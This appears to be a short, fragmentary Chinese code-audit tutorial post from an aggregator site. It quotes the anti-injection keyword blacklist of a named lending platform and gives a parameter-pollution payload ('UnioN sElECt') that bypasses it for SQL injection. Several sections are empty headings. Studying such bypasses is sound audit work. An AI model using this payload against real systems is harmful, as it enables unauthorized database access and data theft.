跟着师傅学代码审计

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了跟着师傅学代码审计相关的知识,希望对你有一定的参考价值。

一、注入

1、绕过WAF

(1)、贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)

防注入类,GET/POST/REQUEST/COOKIE等请求都将经过这个类过滤~

$check= eregi(select|insert|update|delete|\‘|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile, $str);

$string = str_replace(array(&, ", <, >,(,)), array(&amp;, &quot;, &lt;, &gt;,,), $string);

利用hpp+php小特性,绕过EXP:

user_id=-1 UnioN sElECt 1,2,3&user.id= 123123

(2)

 

2、二次注入

 

以上是关于跟着师傅学代码审计的主要内容,如果未能解决你的问题,请参考以下文章

KYXSCMS1.3.2审计与测试

静态代码审计-大牛师长篇

bluecms v1.6 sp1 代码审计学习

安全学习方向

代码审计学php还是java

代码审计思路之PHP代码审计